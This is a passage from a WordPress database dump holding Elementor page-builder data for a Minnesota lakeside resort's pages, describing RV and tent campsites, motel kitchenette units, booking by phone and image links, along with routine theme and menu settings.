miles to St. Joseph by catching the Lake Wobegon Trail.<\\/p><h3>Bring Your Bike the trail is very scenic and level for all ages to enjoy.<\\/h3>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(1155,64,'_elementor_version','2.5.12'),(1157,473,'vantage_panels_no_legacy','true'),(1158,473,'siteorigin_page_settings','a:7:{s:6:\"layout\";s:7:\"default\";s:10:\"page_title\";b:1;s:15:\"masthead_margin\";b:1;s:13:\"footer_margin\";b:1;s:14:\"featured_image\";b:0;s:13:\"hide_masthead\";b:0;s:19:\"hide_footer_widgets\";b:0;}'),(1249,633,'vantage_panels_no_legacy','true'),(1250,633,'_edit_lock','1592230272:3'),(1251,633,'_edit_last','1'),(1252,633,'_elementor_edit_mode','builder'),(1254,633,'_elementor_data','[{\"id\":\"94cd671\",\"elType\":\"section\",\"settings\":{\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"4b673a4\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"308656e\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"6f9d682\"}]},\"elements\":[{\"id\":\"58d69f6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"2ee48a4\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"6709678\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"0fa9e68\"}]},\"elements\":[{\"id\":\"ebaef3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Looking for a Campsite - <a href=\\\"http:\\/\\/ashbyresort.com\\/calendar\\/\\\">Call us at 218-747-2959 to book it<\\/a>\\u00a0 WE ARE NOT ACCEPTING TENT CAMPING AT THIS TIME, DO TO NOT HAVING THE PUBLIC RESTROOMS AND SHOWER HOUSE OPEN.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a430fa4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"fa609b1\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"fd18586\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"a2a06f4\"}]},\"elements\":[{\"id\":\"65244c8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"20e278f\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"0ca8b08\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"ef5ef18\"}]},\"elements\":[{\"id\":\"e3a7208\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN3872.jpg\",\"id\":254},\"caption\":\"WE HAVE RV CAMPING 30 AMP SERVICE\",\"caption_source\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2e4cb59\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"adba769\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"b9b611f\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"12f18e0\"}]},\"elements\":[{\"id\":\"469f791\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN3876.jpg\",\"id\":258},\"caption\":\"THERE ARE FULL HOOK UP 30 AMP SITES\",\"caption_source\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"896f239\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"983db86\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"44b3df9\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"31b947d\"}]},\"elements\":[{\"id\":\"f9f71a7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN3873.jpg\",\"id\":255},\"caption\":\"20 AMP SITES\",\"caption_source\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bc1ab0e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"9ff9492\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"3d31bed\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"c5a0aac\"}]},\"elements\":[{\"id\":\"b3e37bf\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"f0cb2f5\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"a81b13f\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"a0bfc5f\"}]},\"elements\":[{\"id\":\"f7626e5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN3874.jpg\",\"id\":256}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d18f5ee\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"5fd4daa\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"40c1597\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"6cd844e\"}]},\"elements\":[{\"id\":\"7506370\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN3881.jpg\",\"id\":253},\"caption\":\"TENTING NO ELECTRIC SITES\",\"caption_source\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"027804b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"dda391e\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"c0140ee\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"ca1a73a\"}]},\"elements\":[{\"id\":\"9e619c2\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN3879.jpg\",\"id\":252}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5323be5\",\"elType\":\"section\",\"settings\":{\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"741a9c4\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"80d0abc\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"8acdccf\"}]},\"elements\":[{\"id\":\"d29456d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"dc72064\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"42db14b\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"11884b1\"}]},\"elements\":[{\"id\":\"25479ac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>There is also a free shower house and dump station at the resort. Each site comes with a picnic table and most have fire ring.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(1255,634,'_elementor_edit_mode','builder'),(1256,634,'_elementor_data','[{\"id\":\"94cd671\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"58d69f6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ebaef3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Looking for a Campsite - <a href=\\\"http:\\/\\/ashbyresort.com\\/calendar\\/\\\">Call us at 218-747-2959 to book it<\\/a><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a430fa4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"65244c8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e3a7208\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN3872.jpg\",\"id\":254},\"caption\":\"WE HAVE RV CAMPING 30 AMP SERVICE\",\"caption_source\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2e4cb59\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"469f791\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN3876.jpg\",\"id\":258},\"caption\":\"THERE ARE FULL HOOK UP 30 AMP SITES\",\"caption_source\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"896f239\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9f71a7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN3873.jpg\",\"id\":255},\"caption\":\"20 AMP SITES\",\"caption_source\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bc1ab0e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"b3e37bf\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7626e5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN3874.jpg\",\"id\":256}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d18f5ee\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7506370\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN3881.jpg\",\"id\":253},\"caption\":\"TENTING NO ELECTRIC SITES\",\"caption_source\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"027804b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9e619c2\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN3879.jpg\",\"id\":252}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5323be5\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d29456d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"25479ac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>There is also a free shower house and dump station at the resort. Each site comes with a picnic table and most have fire ring.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(1257,633,'_elementor_version','2.9.10'),(1267,633,'_wp_page_template','default'),(1269,633,'vantage_metaslider_slider',''),(1270,633,'vantage_metaslider_slider_stretch','1'),(1271,633,'vantage_menu_icon',''),(1272,633,'siteorigin_page_settings','a:7:{s:6:\"layout\";s:7:\"default\";s:10:\"page_title\";b:1;s:15:\"masthead_margin\";b:1;s:13:\"footer_margin\";b:1;s:14:\"featured_image\";b:0;s:13:\"hide_masthead\";b:0;s:19:\"hide_footer_widgets\";b:0;}'),(1273,633,'_yoast_wpseo_content_score','60'),(1274,636,'_elementor_edit_mode','builder'),(1275,636,'_elementor_data','[{\"id\":\"94cd671\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"58d69f6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ebaef3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Looking for a Campsite - <a href=\\\"http:\\/\\/ashbyresort.com\\/calendar\\/\\\">Call us at 218-747-2959 to book it<\\/a><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a430fa4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"65244c8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e3a7208\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN3872.jpg\",\"id\":254},\"caption\":\"WE HAVE RV CAMPING 30 AMP SERVICE\",\"caption_source\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2e4cb59\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"469f791\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN3876.jpg\",\"id\":258},\"caption\":\"THERE ARE FULL HOOK UP 30 AMP SITES\",\"caption_source\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"896f239\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9f71a7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN3873.jpg\",\"id\":255},\"caption\":\"20 AMP SITES\",\"caption_source\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bc1ab0e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"b3e37bf\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7626e5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN3874.jpg\",\"id\":256}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d18f5ee\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7506370\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN3881.jpg\",\"id\":253},\"caption\":\"TENTING NO ELECTRIC SITES\",\"caption_source\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"027804b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9e619c2\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN3879.jpg\",\"id\":252}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5323be5\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d29456d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"25479ac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>There is also a free shower house and dump station at the resort. Each site comes with a picnic table and most have fire ring.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(1276,636,'_elementor_version','0.4'),(1288,38,'vantage_panels_no_legacy','true'),(1289,47,'vantage_panels_no_legacy','true'),(1291,53,'vantage_panels_no_legacy','true'),(1292,41,'vantage_panels_no_legacy','true'),(1293,15,'vantage_panels_no_legacy','true'),(1295,82,'vantage_panels_no_legacy','true'),(1296,62,'vantage_panels_no_legacy','true'),(1297,85,'vantage_panels_no_legacy','true'),(1298,108,'vantage_panels_no_legacy','true'),(1299,65,'vantage_panels_no_legacy','true'),(1300,474,'vantage_panels_no_legacy','true'),(1301,32,'vantage_panels_no_legacy','true'),(1302,44,'vantage_panels_no_legacy','true'),(1303,89,'vantage_panels_no_legacy','true'),(1304,93,'vantage_panels_no_legacy','true'),(1308,638,'_elementor_edit_mode','builder'),(1309,638,'_elementor_data','[{\"id\":\"94cd671\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"58d69f6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ebaef3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Looking for a Campsite - <a href=\\\"http:\\/\\/ashbyresort.com\\/calendar\\/\\\">Call us at 218-747-2959 to book it<\\/a><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a430fa4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"65244c8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e3a7208\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN3872.jpg\",\"id\":254},\"caption\":\"WE HAVE RV CAMPING 30 AMP SERVICE\",\"caption_source\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2e4cb59\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"469f791\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN3876.jpg\",\"id\":258},\"caption\":\"THERE ARE FULL HOOK UP 30 AMP SITES\",\"caption_source\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"896f239\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9f71a7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN3873.jpg\",\"id\":255},\"caption\":\"20 AMP SITES\",\"caption_source\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bc1ab0e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"b3e37bf\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7626e5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN3874.jpg\",\"id\":256}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d18f5ee\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7506370\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN3881.jpg\",\"id\":253},\"caption\":\"TENTING NO ELECTRIC SITES\",\"caption_source\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"027804b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9e619c2\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN3879.jpg\",\"id\":252}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5323be5\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d29456d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"25479ac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>There is also a free shower house and dump station at the resort. Each site comes with a picnic table and most have fire ring.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(1310,638,'_elementor_version','0.4'),(1312,639,'vantage_panels_no_legacy','true'),(1313,639,'_menu_item_type','post_type'),(1314,639,'_menu_item_menu_item_parent','38'),(1315,639,'_menu_item_object_id','633'),(1316,639,'_menu_item_object','page'),(1317,639,'_menu_item_target',''),(1318,639,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1319,639,'_menu_item_xfn',''),(1320,639,'_menu_item_url',''),(1323,46,'_elementor_edit_mode','builder'),(1324,112,'_edit_lock','1520651032:1'),(1327,46,'_elementor_version','2.5.12'),(1328,112,'_edit_last','1'),(1329,112,'_yoast_wpseo_content_score','30'),(1330,302,'_edit_lock','1520655360:1'),(1331,302,'_edit_last','1'),(1332,302,'_yoast_wpseo_content_score','30'),(1336,46,'_elementor_data','[{\"id\":\"4e2861b\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"8c3aa6f\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"659b4e4\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"9e402ae\"}]},\"elements\":[{\"id\":\"01c17bf\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"1647b79\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"02c2bab\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"65482ce\"}]},\"elements\":[{\"id\":\"a7e9fc6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong> Stay in a Motel Room \\u2013 <\\/strong><strong><a href=\\\"http:\\/\\/ashbyresort.com\\/calendar\\/\\\">Call us at 218-747-2959 to book it<\\/a>\\u00a0 <br \\/><\\/strong><\\/p><p><strong>All motel rooms are available nightly, weekly and long term.<\\/strong><\\/p><p><strong>All units are non smoking !!<\\/strong><\\/p><p><strong>We have motel units with kitchens \\u201cKitchenettes\\u201d<br \\/>and we have units without kitchens \\u201cSleepers\\u201d.<br \\/>or our 2 bedroom Lakeside Villa.<br \\/><\\/strong><\\/p><p>All units are lakeside on level grounds with a park-like setting that is even more captivating during our beautiful sunsets.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"50c4bfe\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"85b2dfc\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"3b6597b\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"ce21cee\"}]},\"elements\":[{\"id\":\"4e66d18\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/Motel.jpg\",\"id\":302},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"640\",\"height\":\"300\"},\"align\":\"center\",\"image_border_border\":\"solid\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6542a16\",\"elType\":\"section\",\"settings\":{\"border_border\":\"solid\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"9169c2a\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"2e3ee46\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"baa1ca0\"}]},\"elements\":[{\"id\":\"23e9738\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"1246eae\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"4831bc2\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"88fa4da\"}]},\"elements\":[{\"id\":\"808cf47\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Kitchenettes #1, 3, 5 &amp; 7<\\/strong><\\/p><p>Are 1 bedroom \\u2013 1 bathroom with 2 double beds Maximum people 4<\\/p><p>also included in a Kitchenette unit is:<br \\/> A Stove (Ovens in #3 &amp; 7 only), microwave, refrigerator, coffee maker, toaster, pots, pans, dishes, TV and airconditioning<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"03f13de\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"194384d\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"2c409aa\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"4855a6f\"}]},\"elements\":[{\"id\":\"c025d32\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"4f25776\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"9599ca8\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"881e1ea\"}]},\"elements\":[{\"id\":\"7e98a34\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN4153.jpg\",\"id\":466}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"1d86d5d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"f3c51bd\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"102abed\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"d557fa6\"}]},\"elements\":[{\"id\":\"015be59\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN4149.jpg\",\"id\":464}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"4985a47\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"24ea3dc\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"15ff13c\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"67e542a\"}]},\"elements\":[{\"id\":\"5c5981a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN4151.jpg\",\"id\":465},\"image_border_width\":{\"unit\":\"px\",\"top\":\"6\",\"right\":\"6\",\"bottom\":\"6\",\"left\":\"6\",\"isLinked\":true},\"image_border_color\":\"#7a7a7a\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7dad932\",\"elType\":\"section\",\"settings\":{\"border_border\":\"solid\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"0e0de0e\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"8f3928c\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"b94c487\"}]},\"elements\":[{\"id\":\"6cb5af4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_an